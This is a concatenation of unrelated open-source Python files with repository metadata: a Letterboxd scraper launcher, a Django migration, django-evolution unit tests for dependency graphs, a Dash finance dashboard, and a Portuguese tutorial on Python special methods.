] | permissive | cmgospod/Groa | 2119714f57bb911d5c9c91597a1b6558448d5dd6 | 31b3624bfe61e772b55f8175b4e95d63c9e67966 | refs/heads/master | 2021-01-02T08:06:29.570942 | 2020-02-07T20:10:54 | 2020-02-07T20:10:54 | 239,560,447 | 1 | 0 | MIT | 2020-02-10T16:38:32 | 2020-02-10T16:38:31 | null | UTF-8 | Python | false | false | 109 | py | from scraper import *
s = Scraper(start=0, end=1781, max_iter=30, scraper_instance=0)
s.scrape_letterboxd() | [
"cmgospod@users.noreply.github.com"
] | cmgospod@users.noreply.github.com |
a3b8e7c2bd30a297c6acbb500964593d46332088 | 3d82768d4f912eb940a1238a3b6347c727e52558 | /expense/migrations/0004_auto_20201024_1825.py | 83e59278f488ec0faee9c08743a0a6ee6c64bc63 | [] | no_license | surajit003/tdd-expense-app | b4dd53c1328f4dd40b39593e09f8afe9e811ff4a | 603c6f56ce35944c1acf8deefd6d7b420576e65d | refs/heads/main | 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | # Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: alters Expense.expense_id (CharField primary key)
    and makes Expense.total a nullable float."""

    dependencies = [("expense", "0003_auto_20201024_1816")]

    operations = [
        migrations.AlterField(
            model_name="expense",
            name="expense_id",
            field=models.CharField(
                # NOTE(review): this default is a single UUID string frozen
                # at makemigrations time, not a per-row generated value —
                # every new row created through this default gets the same
                # id. Confirm the model uses a callable (e.g. uuid.uuid4).
                default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
                max_length=120,
                primary_key=True,
                serialize=False,
            ),
        ),
        migrations.AlterField(
            model_name="expense",
            name="total",
            field=models.FloatField(blank=True, null=True, verbose_name="Total"),
        ),
    ]
| [
"surajit@poweredbypeople.io"
] | surajit@poweredbypeople.io |
7514b141abc126e5037f7efc1213d03689bc0d9c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/tests/test_evolution_graph.py | 6605ada4d37302b6934cfd1385ab441c14c50fee | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 24,833 | py | """Unit tests for django_evolution.utils.graph.EvolutionGraph."""
from __future__ import unicode_literals
from django.db import DEFAULT_DB_ALIAS, connections
from django_evolution.compat.apps import get_app
from django_evolution.models import Evolution, Version
from django_evolution.support import supports_migrations
from django_evolution.tests.base_test_case import (MigrationsTestsMixin,
TestCase)
from django_evolution.tests.decorators import requires_migrations
from django_evolution.tests.evolutions_app.models import EvolutionsAppTestModel
from django_evolution.tests.evolutions_app2.models import \
EvolutionsApp2TestModel
from django_evolution.utils.graph import EvolutionGraph
from django_evolution.utils.migrations import (MigrationExecutor,
MigrationList,
MigrationLoader,
record_applied_migrations)
try:
# Django >= 1.7
from django.db import migrations
from django.db.migrations.graph import MigrationGraph
except ImportError:
# Django < 1.7
MigrationGraph = None
migrations = None
class EvolutionGraphTests(MigrationsTestsMixin, TestCase):
    """Unit tests for django_evolution.utils.graph.EvolutionGraph."""
    # NOTE(review): the graph brackets each app's evolutions with
    # "__first__"/"__last__" anchor nodes, and node keys follow the pattern
    # "<type>:<app_label>:<name>". The assertions below rely on that layout.
    def test_add_evolutions(self):
        """Testing EvolutionGraph.add_evolutions"""
        app = get_app('django_evolution')
        evolutions = [
            Evolution(app_label='django_evolution',
                      label='my_evolution1'),
            Evolution(app_label='django_evolution',
                      label='my_evolution2'),
        ]
        graph = EvolutionGraph()
        graph.add_evolutions(
            app=app,
            evolutions=evolutions,
            new_models=[
                Evolution,
                Version,
            ],
            extra_state={
                'foo': 'bar',
            })
        graph.finalize()
        nodes = graph.get_ordered()
        # Expected: 2 anchors + 2 create-model nodes + 2 evolution nodes.
        self.assertEqual(len(nodes), 6)
        self._check_node(
            nodes[0],
            insert_index=0,
            key='evolution:django_evolution:__first__',
            required_by={
                'create-model:django_evolution:evolution',
            },
            state={
                'anchor': True,
                'app': app,
            })
        self._check_node(
            nodes[1],
            insert_index=1,
            key='create-model:django_evolution:evolution',
            dependencies={
                'evolution:django_evolution:__first__'
            },
            required_by={
                'create-model:django_evolution:version',
            },
            state={
                'app': app,
                'foo': 'bar',
                'model': Evolution,
                'type': graph.NODE_TYPE_CREATE_MODEL,
            })
        self._check_node(
            nodes[2],
            insert_index=2,
            key='create-model:django_evolution:version',
            dependencies={
                'create-model:django_evolution:evolution'
            },
            required_by={
                'evolution:django_evolution:my_evolution1',
            },
            state={
                'app': app,
                'foo': 'bar',
                'model': Version,
                'type': graph.NODE_TYPE_CREATE_MODEL,
            })
        self._check_node(
            nodes[3],
            insert_index=3,
            key='evolution:django_evolution:my_evolution1',
            dependencies={
                'create-model:django_evolution:version'
            },
            required_by={
                'evolution:django_evolution:my_evolution2',
            },
            state={
                'app': app,
                'evolution': evolutions[0],
                'foo': 'bar',
                'type': graph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[4],
            insert_index=4,
            key='evolution:django_evolution:my_evolution2',
            dependencies={
                'evolution:django_evolution:my_evolution1'
            },
            required_by={
                'evolution:django_evolution:__last__',
            },
            state={
                'app': app,
                'evolution': evolutions[1],
                'foo': 'bar',
                'type': graph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[5],
            insert_index=5,
            key='evolution:django_evolution:__last__',
            dependencies={
                'evolution:django_evolution:my_evolution2'
            },
            state={
                'anchor': True,
                'app': app,
            })
    @requires_migrations
    def test_add_migration_plan(self):
        """Testing EvolutionGraph.add_migration_plan"""
        class TestsInitialMigration(migrations.Migration):
            pass
        class TestsAddFieldMigration(migrations.Migration):
            dependencies = [
                ('tests', '0001_initial'),
            ]
        class OtherInitialMigration(migrations.Migration):
            dependencies = [('tests', '0002_add_field')]
        graph = EvolutionGraph()
        # Build a three-migration plan spanning two apps ("tests", "other").
        migration_plan = self._add_migrations(
            graph=graph,
            migrations_info=[
                ('tests', '0001_initial', TestsInitialMigration),
                ('tests', '0002_add_field', TestsAddFieldMigration),
                ('other', '0001_initial', OtherInitialMigration),
            ],
            leaf_migration_targets=[('other', '0001_initial')])
        self.assertEqual(len(migration_plan), 3)
        graph.finalize()
        nodes = graph.get_ordered()
        self.assertEqual(len(nodes), 3)
        self._check_node(
            nodes[0],
            insert_index=0,
            key='migration:tests:0001_initial',
            required_by={
                'migration:tests:0002_add_field',
            },
            state={
                'migration_plan_item': migration_plan[0],
                'migration_target': ('tests', '0001_initial'),
                'type': graph.NODE_TYPE_MIGRATION,
            })
        self._check_node(
            nodes[1],
            insert_index=1,
            key='migration:tests:0002_add_field',
            dependencies={
                'migration:tests:0001_initial',
            },
            required_by={
                'migration:other:0001_initial',
            },
            state={
                'migration_plan_item': migration_plan[1],
                'migration_target': ('tests', '0002_add_field'),
                'type': graph.NODE_TYPE_MIGRATION,
            })
        self._check_node(
            nodes[2],
            key='migration:other:0001_initial',
            dependencies={
                'migration:tests:0002_add_field',
            },
            state={
                'migration_plan_item': migration_plan[2],
                'migration_target': ('other', '0001_initial'),
                'type': graph.NODE_TYPE_MIGRATION,
            })
    def test_mark_evolutions_applied(self):
        """Testing EvolutionGraph.mark_evolutions_applied"""
        app_label = 'app_deps_app'
        app = get_app(app_label)
        evolutions = [
            Evolution(app_label=app_label,
                      label='test_evolution'),
        ]
        graph = EvolutionGraph()
        graph.process_migration_deps = False
        graph.add_evolutions(app=app,
                             evolutions=evolutions)
        # Applied evolutions must not contribute nodes to the final graph;
        # only app_deps_app's evolution (and its anchors) should remain.
        graph.mark_evolutions_applied(app=get_app('evolutions_app'),
                                      evolution_labels=['first_evolution'])
        graph.mark_evolutions_applied(app=get_app('evolutions_app2'),
                                      evolution_labels=['second_evolution'])
        graph.finalize()
        nodes = graph.get_ordered()
        self.assertEqual(len(nodes), 3)
        self._check_node(
            nodes[0],
            insert_index=0,
            key='evolution:app_deps_app:__first__',
            required_by={
                'evolution:app_deps_app:test_evolution',
            },
            state={
                'anchor': True,
                'app': app,
            })
        self._check_node(
            nodes[1],
            insert_index=1,
            key='evolution:app_deps_app:test_evolution',
            dependencies={
                'evolution:app_deps_app:__first__',
            },
            required_by={
                'evolution:app_deps_app:__last__',
            },
            state={
                'app': app,
                'evolution': evolutions[0],
                'type': graph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[2],
            insert_index=2,
            key='evolution:app_deps_app:__last__',
            dependencies={
                'evolution:app_deps_app:test_evolution',
            },
            state={
                'anchor': True,
                'app': app,
            })
    @requires_migrations
    def test_mark_migrations_applied(self):
        """Testing EvolutionGraph.mark_migrations_applied"""
        class TestsInitialMigration(migrations.Migration):
            pass
        class TestsAddFieldMigration(migrations.Migration):
            dependencies = [
                ('tests', '0001_initial'),
            ]
        class OtherInitialMigration(migrations.Migration):
            dependencies = [('tests', '0002_add_field')]
        graph = EvolutionGraph()
        migration_plan = self._add_migrations(
            graph=graph,
            migrations_info=[
                ('tests', '0001_initial', TestsInitialMigration),
                ('tests', '0002_add_field', TestsAddFieldMigration),
                ('other', '0001_initial', OtherInitialMigration),
            ],
            leaf_migration_targets=[('other', '0001_initial')],
            mark_applied=[
                ('tests', '0001_initial'),
                ('tests', '0002_add_field'),
            ])
        # The two applied migrations are excluded from both plan and graph.
        self.assertEqual(len(migration_plan), 1)
        graph.finalize()
        nodes = graph.get_ordered()
        self.assertEqual(len(nodes), 1)
        self._check_node(
            nodes[0],
            insert_index=0,
            key='migration:other:0001_initial',
            state={
                'migration_plan_item': migration_plan[0],
                'migration_target': ('other', '0001_initial'),
                'type': graph.NODE_TYPE_MIGRATION,
            })
    def test_iter_batches(self):
        """Testing EvolutionGraph.iter_batches"""
        evolutions_app = get_app('evolutions_app')
        evolutions_app2 = get_app('evolutions_app2')
        evolution_deps_app = get_app('evolution_deps_app')
        # evolutions_app
        evolutions1 = [
            Evolution(app_label='evolutions_app',
                      label='first_evolution'),
            Evolution(app_label='evolutions_app',
                      label='second_evolution'),
        ]
        models1 = [EvolutionsAppTestModel]
        # evolutions_app2
        evolutions2 = [
            Evolution(app_label='evolutions_app2',
                      label='first_evolution'),
            Evolution(app_label='evolutions_app2',
                      label='second_evolution'),
        ]
        models2 = [EvolutionsApp2TestModel]
        # evolution_deps_app
        evolutions3 = [
            Evolution(app_label='evolution_deps_app',
                      label='test_evolution'),
        ]
        graph = EvolutionGraph()
        # Only follow migration dependencies when this Django has migrations.
        graph.process_migration_deps = supports_migrations
        if supports_migrations:
            connection = connections[DEFAULT_DB_ALIAS]
            migration_executor = MigrationExecutor(connection=connection)
            migration_loader = MigrationLoader(connection=connection)
            migration_plan = migration_executor.migration_plan([
                ('migrations_app', '0002_add_field'),
                ('migrations_app2', '0002_add_field'),
            ])
            migration_loader.build_graph()
            graph.add_migration_plan(migration_plan=migration_plan,
                                     migration_graph=migration_loader.graph)
        else:
            migration_plan = None
        graph.add_evolutions(app=evolutions_app,
                             evolutions=evolutions1,
                             new_models=models1)
        graph.add_evolutions(app=evolutions_app2,
                             evolutions=evolutions2,
                             new_models=models2)
        graph.add_evolutions(app=evolution_deps_app,
                             evolutions=evolutions3)
        graph.finalize()
        all_batches = list(graph.iter_batches())
        if supports_migrations:
            self.assertEqual(len(all_batches), 6)
            excluded_migration_deps = set()
        else:
            self.assertEqual(len(all_batches), 4)
            excluded_migration_deps = {
                'migration:migrations_app:0001_initial',
                'migration:migrations_app2:0002_add_field',
            }
        # Turn this back into a generator so we can more easily check these
        # batches with/without migrations, depending on the version of Django
        # the tests are being run on.
        batches = iter(all_batches)
        # Check the first migrations batch.
        if supports_migrations:
            node_type, nodes = next(batches)
            self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
            self.assertEqual(len(nodes), 3)
            self._check_node(
                nodes[0],
                key='migration:migrations_app:0001_initial',
                required_by={
                    'evolution:evolution_deps_app:test_evolution',
                    'migration:migrations_app:0002_add_field',
                },
                state={
                    'migration_plan_item': migration_plan[0],
                    'migration_target': ('migrations_app', '0001_initial'),
                    'type': EvolutionGraph.NODE_TYPE_MIGRATION,
                })
            self._check_node(
                nodes[1],
                key='migration:migrations_app:0002_add_field',
                dependencies={
                    'migration:migrations_app:0001_initial',
                },
                required_by={
                    'migration:migrations_app2:0001_initial',
                },
                state={
                    'migration_plan_item': migration_plan[1],
                    'migration_target': ('migrations_app', '0002_add_field'),
                    'type': EvolutionGraph.NODE_TYPE_MIGRATION,
                })
            self._check_node(
                nodes[2],
                key='migration:migrations_app2:0001_initial',
                dependencies={
                    'migration:migrations_app:0002_add_field',
                },
                required_by={
                    'migration:migrations_app2:0002_add_field',
                },
                state={
                    'migration_plan_item': migration_plan[2],
                    'migration_target': ('migrations_app2', '0001_initial'),
                    'type': EvolutionGraph.NODE_TYPE_MIGRATION,
                })
        # Check the first create-model batch.
        node_type, nodes = next(batches)
        self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
        self.assertEqual(len(nodes), 1)
        self._check_node(
            nodes[0],
            key='create-model:evolutions_app:evolutionsapptestmodel',
            dependencies={
                'evolution:evolutions_app:__first__',
            },
            required_by={
                'evolution:evolutions_app:first_evolution',
            },
            state={
                'app': evolutions_app,
                'model': EvolutionsAppTestModel,
                'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
            })
        # Check the first evolution batch.
        node_type, nodes = next(batches)
        self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
        self.assertEqual(len(nodes), 3)
        self._check_node(
            nodes[0],
            key='evolution:evolutions_app:first_evolution',
            dependencies={
                'create-model:evolutions_app:evolutionsapptestmodel',
            },
            required_by={
                'evolution:evolution_deps_app:test_evolution',
                'evolution:evolutions_app:second_evolution',
            },
            state={
                'app': evolutions_app,
                'evolution': evolutions1[0],
                'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[1],
            key='evolution:evolutions_app:second_evolution',
            dependencies={
                'evolution:evolutions_app:first_evolution',
            },
            required_by={
                'evolution:evolutions_app:__last__',
            },
            state={
                'app': evolutions_app,
                'evolution': evolutions1[1],
                'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[2],
            key='evolution:evolution_deps_app:test_evolution',
            dependencies={
                'evolution:evolution_deps_app:__first__',
                'evolution:evolutions_app:first_evolution',
                'evolution:evolutions_app:__last__',
                'migration:migrations_app:0001_initial',
            } - excluded_migration_deps,
            required_by={
                'evolution:evolution_deps_app:__last__',
                'evolution:evolutions_app2:__first__',
                'evolution:evolutions_app2:second_evolution',
                'migration:migrations_app2:0002_add_field',
            } - excluded_migration_deps,
            state={
                'app': evolution_deps_app,
                'evolution': evolutions3[0],
                'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
            })
        if supports_migrations:
            # Check the second migration batch.
            node_type, nodes = next(batches)
            self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
            self.assertEqual(len(nodes), 1)
            self._check_node(
                nodes[0],
                key='migration:migrations_app2:0002_add_field',
                dependencies={
                    'evolution:evolution_deps_app:test_evolution',
                    'migration:migrations_app2:0001_initial',
                },
                state={
                    'migration_plan_item': migration_plan[3],
                    'migration_target': ('migrations_app2', '0002_add_field'),
                    'type': EvolutionGraph.NODE_TYPE_MIGRATION,
                })
        # Check the second create-model batch.
        node_type, nodes = next(batches)
        self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
        self.assertEqual(len(nodes), 1)
        self._check_node(
            nodes[0],
            key='create-model:evolutions_app2:evolutionsapp2testmodel',
            dependencies={
                'evolution:evolutions_app2:__first__',
            },
            required_by={
                'evolution:evolutions_app2:first_evolution',
            },
            state={
                'app': evolutions_app2,
                'model': EvolutionsApp2TestModel,
                'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
            })
        # Check the second evolution batch.
        node_type, nodes = next(batches)
        self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
        self.assertEqual(len(nodes), 2)
        self._check_node(
            nodes[0],
            key='evolution:evolutions_app2:first_evolution',
            dependencies={
                'create-model:evolutions_app2:evolutionsapp2testmodel',
            },
            required_by={
                'evolution:evolutions_app2:second_evolution',
            },
            state={
                'app': evolutions_app2,
                'evolution': evolutions2[0],
                'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
            })
        self._check_node(
            nodes[1],
            key='evolution:evolutions_app2:second_evolution',
            dependencies={
                'evolution:evolution_deps_app:test_evolution',
                'evolution:evolutions_app2:first_evolution',
            },
            required_by={
                'evolution:evolutions_app2:__last__',
            },
            state={
                'app': evolutions_app2,
                'evolution': evolutions2[1],
                'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
            })
    def _add_migrations(self, graph, migrations_info, leaf_migration_targets,
                        mark_applied=[]):
        """Add migrations to a graph.
        This is a utility for simplifying the additions of a list of
        migrations to a graph, handling the creation of the Django migration
        objects, the formulation of a migration plan, and the recording of
        applied migrations.
        Args:
            graph (django_evolution.utils.graph.EvolutionGraph):
                The graph to add migrations to.
            migrations_info (list of tuple):
                The list of info on migrations to add. Each tuple contains:
                1. The app label
                2. The migration name
                3. The migration class
            leaf_migration_targets (list of tuple):
                The list of final migration targets to migrate to.
            mark_applied (list of tuple, optional):
                The list of migration targets to mark as applied.
        Returns:
            list of tuple:
                The migration plan generated from the migrations.
        """
        migration_list = MigrationList()
        for app_label, name, migration_cls in migrations_info:
            migration_list.add_migration_info(
                app_label=app_label,
                name=name,
                migration=migration_cls(name, app_label))
        connection = connections[DEFAULT_DB_ALIAS]
        if mark_applied:
            mark_applied_list = MigrationList()
            mark_applied_list.add_migration_targets(mark_applied)
            record_applied_migrations(connection, mark_applied_list)
        else:
            mark_applied_list = None
        migration_executor = MigrationExecutor(
            connection=connection,
            custom_migrations=migration_list)
        migration_loader = MigrationLoader(
            connection=connection,
            custom_migrations=migration_list)
        migration_plan = \
            migration_executor.migration_plan(leaf_migration_targets)
        migration_loader.build_graph()
        graph.add_migration_plan(migration_plan=migration_plan,
                                 migration_graph=migration_loader.graph)
        if mark_applied_list:
            graph.mark_migrations_applied(mark_applied_list)
        return migration_plan
    def _check_node(self, node, key, insert_index=None, dependencies=set(),
                    required_by=set(), state={}):
        """Check a graph node for validity.
        This will assert if any of the provided arguments don't match the
        node.
        Args:
            node (django_evolution.utils.graph.Node):
                The graph node to check.
            key (unicode):
                The expected node key.
            insert_index (int, optional):
                The expected insert index. If not provided, this won't be
                checked.
            dependencies (set, optional):
                The node keys expected as dependencies.
            required_by (set, optional):
                The node keys expected to require this node.
            state (dict, optional):
                The expected state of the node.
        Raises:
            AssertionError:
                The node did not match the expected arguments.
        """
        self.assertEqual(node.key, key)
        self.assertEqual(node.state, state)
        self.assertEqual({_node.key for _node in node.dependencies},
                         dependencies)
        self.assertEqual({_node.key for _node in node.required_by},
                         required_by)
        if insert_index is not None:
            self.assertEqual(node.insert_index, insert_index)
| [
"christian@beanbaginc.com"
] | christian@beanbaginc.com |
5c1af70eb8f9c878ff51c045769f6b423b061baa | 0dde244a6e4ebbf255d1e9d0e98ac66fce1f06cd | /src/ui/overview.py | 02629a0576d5ad304a2594094c38836a09312745 | [] | no_license | uridanan/Mint | dabe1ded7b3ab57cb5dd9761fcc5f69267d5cff7 | 5b6a8ee12aff798b6d7f5ba0e7baa49bd9a8f7f6 | refs/heads/master | 2020-03-20T07:11:26.514511 | 2019-11-05T21:40:14 | 2019-11-05T21:40:14 | 137,273,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,895 | py | import dash_core_components as dcc
import dash_html_components as html
import src.db.dbAccess as db
from dash.dependencies import Input, Output
import plotly.graph_objs as go
from src.app import app
from src.ui.timeseries import *
from src.sessions.globals import session
#TODO Change the report to the data presented in the graphs
#https://plot.ly/python/time-series/
#TODO Look at morning star tickers for proper time series?
#https://dash.plot.ly/gallery
#https://dash.plot.ly/dash-core-components/tabs
#TODO: Format fields per data type
#TODO: Make the table scrollable (use my own CSS)
#TODO: use range slider for date span and upload component for file import https://dash.plot.ly/dash-core-components
#TODO: manage categories form: create categories and assign businesses to them
#TODO: think of suggesting categories based on classification by others, but each uesr gets to assign businesses as they like
#TODO: add range slider to select dates range
#TODO: start marking recurring expenses
#TODO: import the rest of the credit cards
#TODO: rename expense (save the new name, re-use when recurring)
#TODO: show credit (income) report
#TODO: use upload component to upload files
#TODO: Format using the example "Label Lines with Annotations" from https://plot.ly/python/line-charts/
#TODO: add name for undefined
def generateTimeSeries(categories, dataFrame):
    """Build a plotly figure dict with one expenses trace per category."""
    timeSeries = TimeSeriesData(dataFrame)
    traces = [
        go.Scatter(x=timeSeries.getDates(),
                   y=timeSeries.getSeriesByName(category),
                   name=category,
                   opacity=0.8)
        for category in categories
    ]
    return {
        'data': traces,
        'layout': {
            'title': "Expenses by category over time",
            'xaxis': {'title': 'Month'},
            'yaxis': {'title': 'Expenses'},
        },
    }
def testFigure():
    """Build the demo "NY temperatures" line figure.

    Returns a plotly figure dict with six traces (high/low for 2014, 2007
    and 2000). The original built each trace with copy-pasted code; the
    traces are data-driven here, producing the same traces in the same
    order with identical styling.
    """
    # Add data
    month = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
             'August', 'September', 'October', 'November', 'December']
    high_2000 = [32.5, 37.6, 49.9, 53.0, 69.1, 75.4, 76.5, 76.6, 70.7, 60.6, 45.1, 29.3]
    low_2000 = [13.8, 22.3, 32.5, 37.2, 49.9, 56.1, 57.7, 58.3, 51.2, 42.8, 31.6, 15.9]
    high_2007 = [36.5, 26.6, 43.6, 52.3, 71.5, 81.4, 80.5, 82.2, 76.0, 67.3, 46.1, 35.0]
    low_2007 = [23.6, 14.0, 27.0, 36.8, 47.6, 57.7, 58.9, 61.2, 53.3, 48.5, 31.0, 23.6]
    high_2014 = [28.8, 28.5, 37.0, 56.8, 69.7, 79.7, 78.5, 77.8, 74.1, 62.6, 45.3, 39.9]
    low_2014 = [12.7, 14.3, 18.6, 35.5, 49.9, 58.0, 60.0, 58.6, 51.7, 45.2, 32.2, 29.1]
    # Create and style traces: highs in red, lows in blue; older years get
    # progressively "lighter" dash styles ('dash', then 'dot').
    series = [
        ('High 2014', high_2014, 'rgb(205, 12, 24)', None),
        ('Low 2014', low_2014, 'rgb(22, 96, 167)', None),
        ('High 2007', high_2007, 'rgb(205, 12, 24)', 'dash'),
        ('Low 2007', low_2007, 'rgb(22, 96, 167)', 'dash'),
        ('High 2000', high_2000, 'rgb(205, 12, 24)', 'dot'),
        ('Low 2000', low_2000, 'rgb(22, 96, 167)', 'dot'),
    ]
    data = []
    for name, values, color, dash in series:
        line = dict(color=color, width=4)
        if dash is not None:
            # dash options include 'dash', 'dot', and 'dashdot'
            line['dash'] = dash
        data.append(go.Scatter(x=month, y=values, name=name, line=line))
    # Edit the layout
    layout = dict(title='Average High and Low Temperatures in New York',
                  xaxis=dict(title='Month'),
                  yaxis=dict(title='Temperature (degrees F)'),
                  )
    fig = dict(data=data, layout=layout)
    return fig
#Try an iplot instead
#https://plot.ly/python/table/
def generateTable(dataframe, max_rows=200):
    """Render *dataframe* as an html.Table with at most *max_rows* data rows."""
    columns = dataframe.columns
    header_row = html.Tr([html.Th(col) for col in columns])
    row_count = min(len(dataframe), max_rows)
    body_rows = [
        html.Tr([html.Td(dataframe.iloc[i][col]) for col in columns])
        for i in range(row_count)
    ]
    return html.Table([header_row] + body_rows)
def generateBarGraph(data, xName, yNames, names):
    """Build a plotly bar-chart figure dict.

    Args:
        data: mapping/DataFrame of column name -> sequence of values.
        xName: column used for the x axis of every bar series.
        yNames: columns to plot, one bar series each.
        names: display names, parallel to ``yNames``.

    Returns:
        A ``{'data': [...]}`` figure dict with one bar trace per y column.
    """
    # zip pairs each y column with its display name directly (the original
    # indexed two parallel lists with range(len(...))).
    return {
        'data': [
            {'x': data[xName], 'y': data[yName], 'type': 'bar', 'name': name}
            for yName, name in zip(yNames, names)
        ]
    }
# Paths (relative to the app's working directory) of the SQL files that back
# each report; they are passed to db.runQueryFromFile by the callbacks below.
F_BALANCE = 'queries/queryBalanceReport.sql'
F_SAVINGS = 'queries/querySavingsReport.sql'
F_GETCATEGORIES = 'queries/queryCategoryFilter.sql'
F_CATEGORIESOVERTIME = 'queries/queryExpensesByCategoryOverTime.sql'
def getCategories():
    """Return the current user's category names.

    Runs the category-filter query and extracts the first column of each
    result row.
    """
    df = db.runQueryFromFile(F_GETCATEGORIES, session.getUserIdParam())
    # The original bound this to ``list``, shadowing the builtin.
    return [row[0] for row in df.values]
# Page skeleton: title, the three report tabs, a placeholder the tab callback
# fills in, and the per-category time-series graph (filled by callbacks below).
layout = html.Div(children=[
    # Fixed the user-visible typo "Pogress" -> "Progress".
    html.H4(id='title', children='Bank Report - Work In Progress'),
    dcc.Tabs(id="tabs", value='tab1', children=[
        dcc.Tab(label='Balance', value='tab1'),
        dcc.Tab(label='Savings', value='tab2'),
        dcc.Tab(label='IncomeVSExpenses', value='tab3')
    ]),
    html.Div(id='tabsContent'),
    dcc.Graph(id='byCategory')
])
@app.callback(Output('byCategory', 'figure'),
              [Input('title', 'children')])
def updateCategoriesGraph(title):
    """Rebuild the per-category expenses time-series for the current user."""
    frame = db.runQueryFromFile(F_CATEGORIESOVERTIME, session.getUserIdParam())
    categories = getCategories()
    return generateTimeSeries(categories, frame)
@app.callback(Output('tabsContent', 'children'),
              [Input('tabs', 'value')])
def render_content(tab):
    """Render the body of the selected overview tab.

    ``tab`` is 'tab1' (balance), 'tab2' (savings) or 'tab3' (income vs
    expenses). Unknown values fall through and return None, as before.
    """
    balanceData = db.runQueryFromFile(F_BALANCE, session.getUserIdParam())
    savingsData = db.runQueryFromFile(F_SAVINGS, session.getUserIdParam())
    if tab == 'tab1':
        return html.Div([
            html.H3('Balance over time'),
            dcc.Graph(id='balance-graph', figure=generateBarGraph(balanceData, "monthname", ["balance"], ["Balance"]))
        ])
    elif tab == 'tab2':
        return html.Div([
            html.H3('Savings over time'),
            dcc.Graph(id='savings-graph', figure=generateBarGraph(savingsData, "monthname", ["savings"], ["Savings"]))
        ])
    elif tab == 'tab3':
        # Heading previously read 'Savings over time' (copy-paste from tab2);
        # this tab actually plots income against expenses.
        return html.Div([
            html.H3('Income vs expenses over time'),
            dcc.Graph(id='income-graph',
                      figure=generateBarGraph(savingsData, "monthname", ["monthlycredit", "monthlydebit"], ["Income", "Expenses"]))
        ])
| [
"uridanan@gmail.com"
] | uridanan@gmail.com |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe | 31eaed64b0caeda5c5fe3603609402034e6eb7be | /ignorancia_zero/iz_aula-064 - programação orientada a objetos.py | e7aa8a74376c2e9fbd0ede1bee421dec1ba61654 | [] | no_license | RaphaelfsOliveira/workspace_python | 93657b581043176ecffb5783de208c0a00924832 | 90959697687b9398cc48146461750942802933b3 | refs/heads/master | 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # metodo especial construtor de objeto
# instantiates the object
'__init__'
# returns the object in the form of a dictionary
'__dict__'
# converts the object to a string; must always return a string
'__str__'
# performs operations with another instance of the object, only via the + - / * signs
'__add__'
# prints the documentation written in the class of the instantiated object
'__doc__'
class Conta(object):
    # Tutorial class: a toy bank account demonstrating Python special methods.
    # The Portuguese docstrings are left byte-identical on purpose: the class
    # docstring is printed at module level via ``bra.__doc__``, so it is
    # runtime-visible output.
    '''O Objeto conta representa uma conta de banco'''
    def __init__(self, ID, saldo):
        # Constructor: store the account id and the opening balance.
        '''metodo construtor do objeto'''
        self.ID = ID
        self.saldo = saldo
    def __str__(self):
        # String form used by str()/print(): the id plus the balance in R$.
        '''transforma o objeto em string'''
        return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)
    def __add__(self, outro):
        # ``a + b`` folds the other account's balance into this one, in
        # place, and returns None - deliberate for the lesson, though not
        # how an idiomatic __add__ would behave.
        '''faz operações com outra instancia do objeto somente com sinal + - / *'''
        self.saldo += outro.saldo
    def __call__(self, x):
        # Makes instances callable: ``conta(x)`` simply echoes x back.
        '''torna o objeto chamavel para realizar alguma operação'''
        return x
# Demo: create two accounts and inspect the special attributes.
bra = Conta(123, 5000)
ita = Conta(456, 8000)
# __dict__ exposes the instance attributes as a plain dictionary.
print(bra.__dict__, '__dict__ devolve o objeto como dicionario')
# __doc__ is the class docstring defined on Conta.
print(bra.__doc__, '__doc__ documentação da classe do objeto')
# No-op module-level string: an illustrative REPL transcript about
# inheritance (issubclass and __bases__), kept verbatim from the lesson.
'''
>>> class Pai:
	pass
>>> class Filho(Pai):
	pass
>>> class Neto(Filho):
	pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
| [
"raphaelbrf@gmail.com"
] | raphaelbrf@gmail.com |
